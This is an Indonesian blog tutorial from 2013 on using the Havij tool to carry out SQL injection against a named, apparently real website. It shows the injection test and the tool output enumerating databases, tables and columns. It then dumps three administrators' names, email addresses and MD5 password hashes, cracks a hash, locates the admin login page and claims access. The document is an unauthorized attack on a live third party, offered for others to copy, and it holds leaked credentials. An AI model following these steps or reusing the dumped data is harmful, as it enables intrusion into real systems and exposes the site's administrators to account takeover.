Wednesday, 12 June 2013

Tutorial SQL Injection Menggunakan Havij 1.10

Havij Vers 1.10 , sebuah tool yang powerfull untuk mendapatkan akses admin dengan teknik sql injection. untuk informasi dan download tool ini bisa anda temukan di thread dibawah ini.
https://www.box.net/shared/ky9xenske7
Ok saya asumsikan anda sudah download dan install di mesin anda. sekarang mari kita coba salah satu website.
web target : http://www.xenia.co.il/index.php?page_id=93
seperti biasanya berikan tanda ‘ pada web tsb: http://www.xenia.co.il/index.php?page_id=’93
hasilnya dapat anda lihat pada gambar dibawah. BUG SQL Injection
Image
Sekarang jalankan tool Havij lalu masukkan link tersebut lalu klik Analize dan tunggu beberapa saat (yang ini ga sampe 1 menit).

Image
hasilnya:
Havij 1.10 ready!
Analyzing http://www.xenia.co.il/index.php?page_id=’93
Host IP: 212.150.130.231
Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
Powered-by: PHP/5.2.12
Keyword Found: mysql_num_rows():
I guess injection type is Integer?!
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 1
Target Vulnerable :D
Current DB: xeniaco_xenia
w007s…… I Got the database… sekarang klik Tables lalu klik Get Tables.
Image
w007s….. I gOt the Tables from xeniaco_xenia database..
users_match
users_fav
params_parents
params_pages
params_icons
params
page_managers
page_banned
page_allowed
nuke_users
newsletter1
main_access
lpn_users_areas_maps
lpn_users_areas
ip_blocker
gallery_auth_users
form_datas
enter_rules
cat_tbl
bep_users_target
bep_users_cats
bep_pics
bep_other
bep_news
bep_links
bep_html_data
bep_files
bep_data
bep_banners
bep_addons
banners
admins
admin_titles
WhoIsOnLineTbl
WhoIsOnLineMessagesTbl
Table1
Nah .. pada tahap ini, anda perlu cari tahu… dimana letak table yang berisi informasi admin login. setelah ditelusuri ternyata terdapat pada tabel nuke_users. sekarang coba kita lihat isi kolom daripada tabel nuke_users.
Beri tanda centang pada nuke_users lalu klik Get Columns dan tunggu beberapa saat (hmmm… 10 detik aja).
Image
w007ss…. cool.. got to check it out… saya dapatkan kolom sbb
regdate
status
regkey
user_msg_to_mail
mail_check_interval
mail_pass
mail_login
mail_port
mail_server
user_level
user_rank
user_attachsig
user_posts
user_char
newsletter
counter
commentmax
theme
ublock
ublockon
bio
noscore
thold
uorder
umode
storynum
apass
pass
user_cell
user_homephone
user_theme
user_viewemail
user_sig
user_homepage
user_from
user_sign
user_dob
user_regdate
user_avatar
l_name
femail
email
uname
name uid
newsletter1
nah.. ini adalah kolom dari tabel nuke_users yang berisi informasi registrasi, nama, password, email, nomor hp dari Admin website http://www.xenia.co.il.. sekarang saya akan mencoba mendapatkan akses selanjutnya ke website ini.. hmmmm…. saya ceklis aja kolom :
name
email
pass
(kolom lain ga penting.. cuma pengen dapat username dan passwordnya aja).
lalu klik Get Data dan
Image
Hasilnya sebagai berikut :
Count(*) of xeniaco_xenia.nuke_users is 3
Data Found: name=àåãé
Data Found: email=udi@tmuna.co.il
Data Found: pass=b440097c79ba6183170f5f118b47a31d
Data Found: name=guy
Data Found: email=guy@xenia.co.il
Data Found: pass=f4384abb3921b5cf321a5a24960c4aef
Data Found: name=inbar
Data Found: email=inbar@xenia.co.il
Data Found: pass=b3f61131b6eceeb2b14835fa648a48ff
w007s…. ternyata website ini memiliki 3 administrator…
hmmmm… passwordnya di HASH alias di-enkripsi….. no problem… havij juga punya md5 hash crack..
Klik MD5 masukkan data salah satu data HASH lalu klik start (tunggu beberapa saat…. 30 detik deh). lalu hasilnya

w0000000000000000000000000000007ZZZZZZZZZZZZZZZZ… password berhasil di-crack.. sekarang tinggal cari halaman login.
Klik Find Admin lalu isi Path to search dengan http://www.xenia.co.il/ lalu klik start…. …. …………. Searching
Image
Got that….
Page Found: http://www.xenia.co.il/login.php
Sekarang anda hanya tinggal ke halaman login, masukkan nama user password dan….
U gained an Access
Image